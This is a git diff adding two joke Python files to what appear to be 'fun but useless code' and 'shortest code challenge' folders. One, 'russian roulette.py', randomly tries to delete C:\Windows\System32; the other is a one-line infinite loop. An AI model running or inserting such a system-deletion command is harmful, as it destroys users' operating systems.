diff --git "a/\345\245\275\347\216\251\344\275\206\346\262\241\344\273\200\344\271\210\347\224\250\344\273\243\347\240\201/russian roulette.py" "b/\345\245\275\347\216\251\344\275\206\346\262\241\344\273\200\344\271\210\347\224\250\344\273\243\347\240\201/russian roulette.py" new file mode 100644 index 0000000000000000000000000000000000000000..b00b9413b1abb91f54dc0c9072c1fa1d329b1c6c --- /dev/null +++ "b/\345\245\275\347\216\251\344\275\206\346\262\241\344\273\200\344\271\210\347\224\250\344\273\243\347\240\201/russian roulette.py" @@ -0,0 +1,4 @@ +import random +import os +if random.randint(0,6) == 1: +os.remove("C:\Windows\System32") \ No newline at end of file diff --git "a/\346\234\200\347\237\255\344\273\243\347\240\201\346\214\221\346\210\230/Shortest infinite Python program.py" "b/\346\234\200\347\237\255\344\273\243\347\240\201\346\214\221\346\210\230/Shortest infinite Python program.py" new file mode 100644 index 0000000000000000000000000000000000000000..dc9554d42023dbd946f7826f480c4370858dafcc --- /dev/null +++ "b/\346\234\200\347\237\255\344\273\243\347\240\201\346\214\221\346\210\230/Shortest infinite Python program.py" @@ -0,0 +1 @@ +while 1:0 \ No newline at end of file